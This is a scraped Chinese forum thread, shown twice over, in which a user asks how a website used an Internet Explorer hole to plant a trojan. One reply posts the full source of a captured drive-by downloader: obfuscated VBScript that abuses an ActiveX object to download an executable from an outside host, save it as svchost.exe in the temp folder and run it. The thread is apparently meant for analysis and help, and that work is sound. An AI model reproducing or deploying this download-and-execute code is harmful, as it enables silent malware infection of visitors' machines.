请高手分析一下这个网站用了IE的什么漏洞传播病毒的?该如何解决
日期:2014-05-16 浏览次数:20402 次
请高手分析一下这个网站用了IE的什么漏洞传播病毒的?
今天google一个东西,然后开这个网页:http://www.chmhome.com/technology/program-design/soft/20070707/81305.html
发现有点慢,鼠标也有点闪,好像在执行什么东西似的,心想坏了,于是赶紧按下复位键,没想到结果还是中招了,后来我查看了临时目录下的文件,发现打开该网页的时候,下载了一个BAT文件、一个vbs脚本和一个木马,vbs脚本负责运行该木马和批处理,我的浏览器(IE6 SP1)权限都是默认级别的,按道理远程用户是没有权限执行这些操作的,那么他能够把病毒下载到我的机器上并且执行,那就肯定是利用了什么漏洞,我用flashget把这个页面的源代码下载下来了,并且跟踪了里面的一些script,但是本人水平有限,目前还没有发现他们是如何利用漏洞的,所以在此请教各位一起帮忙分析一下,(纯属学习目的,本人极度痛恨制作木马病毒的这帮鸟人,明白原理之后也会知道怎么应付)。谢谢!
------解决方案--------------------
这样的网站多了...没办法....
如果带病毒的话,google的搜索貌似会提醒的....
不懂 帮顶了....
------解决方案--------------------
http://www.chmhome.com/technology/program-design/soft/20070707/81305.html
打开这个网页,没什么问题。
------解决方案--------------------
up..
------解决方案--------------------
UP~
------解决方案--------------------
参考:http://www.number87.com/computer/net/074136524005-k69q0301.htm
------解决方案--------------------
MARK
------解决方案--------------------
偷偷下载在自动运行好像不一定要通过ie漏洞吧.
------解决方案--------------------
看了半天没发现可以物体啊...
------解决方案--------------------
MARK
------解决方案--------------------
发一个我以前截获的一个病毒源代码:主要利用 adodb.stream、xmlhttp、fso等来下病毒并执行exe..
<html>
<body>
<script type= "text/jscript ">
function init () {
document.write( " <center> <font color=red> </font> <center> ");}
window.onload = init;
</script>
<script language= "VBScript ">
on error resume next
tcsafe = "http://www.123.com/1.exe " //这个是病毒
m1= "object "
m2= "classid "
m3= "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
m4= "Microsoft.XMLHTTP "
m5= "Shell.Application "
m6= "Scripting.FileSystemObject "
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5, " ")
dd= "open "
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi, " ")
a1= "Ado "
a2= "db. "
a3= "Str "
a4= "eam "
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg, " ")
Xa.type = 1
Xh= "GET "
Xd.Open Xh, tcsafe, False
Xd.Send
X9= "svchost.exe "
set Xb = Xc.createobject(m6, " ")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
dd= "Xa.BuildPath(Xa,X8) "
X8=dd
d1= "Xb.BuildPath(Xb,X7) "
X7=d1
d2= "Xc.BuildPath(Xd,X6) "
X6=d2
d3= "Xd.BuildPath(Xf,X5) "
X5=d3
d4= "Xe.BuildPath(Xg,X4) "
X4=d4
d5= "Xf.BuildPath(Xh,X4) "
X3=d5
d6= "Xg.BuildPath(Xi,X3) "
X2=d6
d7= "Xh.BuildPath(Xg,X1) "
X1=d7
d8= "Xi.BuildPath(Xk,X0) "
X0=d8
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>
</body>
</html>
今天google一个东西,然后开这个网页:http://www.chmhome.com/technology/program-design/soft/20070707/81305.html
发现有点慢,鼠标也有点闪,好像在执行什么东西似的,心想坏了,于是赶紧按下复位键,没想到结果还是中招了,后来我查看了临时目录下的文件,发现打开该网页的时候,下载了一个BAT文件、一个vbs脚本和一个木马,vbs脚本负责运行该木马和批处理,我的浏览器(IE6 SP1)权限都是默认级别的,按道理远程用户是没有权限执行这些操作的,那么他能够把病毒下载到我的机器上并且执行,那就肯定是利用了什么漏洞,我用flashget把这个页面的源代码下载下来了,并且跟踪了里面的一些script,但是本人水平有限,目前还没有发现他们是如何利用漏洞的,所以在此请教各位一起帮忙分析一下,(纯属学习目的,本人极度痛恨制作木马病毒的这帮鸟人,明白原理之后也会知道怎么应付)。谢谢!
------解决方案--------------------
这样的网站多了...没办法....
如果带病毒的话,google的搜索貌似会提醒的....
不懂 帮顶了....
------解决方案--------------------
http://www.chmhome.com/technology/program-design/soft/20070707/81305.html
打开这个网页,没什么问题。
------解决方案--------------------
up..
------解决方案--------------------
UP~
------解决方案--------------------
参考:http://www.number87.com/computer/net/074136524005-k69q0301.htm
------解决方案--------------------
MARK
------解决方案--------------------
偷偷下载在自动运行好像不一定要通过ie漏洞吧.
------解决方案--------------------
看了半天没发现可以物体啊...
------解决方案--------------------
MARK
------解决方案--------------------
发一个我以前截获的一个病毒源代码:主要利用 adodb.stream、xmlhttp、fso等来下病毒并执行exe..
<html>
<body>
<script type= "text/jscript ">
function init () {
document.write( " <center> <font color=red> </font> <center> ");}
window.onload = init;
</script>
<script language= "VBScript ">
on error resume next
tcsafe = "http://www.123.com/1.exe " //这个是病毒
m1= "object "
m2= "classid "
m3= "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
m4= "Microsoft.XMLHTTP "
m5= "Shell.Application "
m6= "Scripting.FileSystemObject "
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5, " ")
dd= "open "
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi, " ")
a1= "Ado "
a2= "db. "
a3= "Str "
a4= "eam "
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg, " ")
Xa.type = 1
Xh= "GET "
Xd.Open Xh, tcsafe, False
Xd.Send
X9= "svchost.exe "
set Xb = Xc.createobject(m6, " ")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
dd= "Xa.BuildPath(Xa,X8) "
X8=dd
d1= "Xb.BuildPath(Xb,X7) "
X7=d1
d2= "Xc.BuildPath(Xd,X6) "
X6=d2
d3= "Xd.BuildPath(Xf,X5) "
X5=d3
d4= "Xe.BuildPath(Xg,X4) "
X4=d4
d5= "Xf.BuildPath(Xh,X4) "
X3=d5
d6= "Xg.BuildPath(Xi,X3) "
X2=d6
d7= "Xh.BuildPath(Xg,X1) "
X1=d7
d8= "Xi.BuildPath(Xk,X0) "
X0=d8
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>
</body>
</html>
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
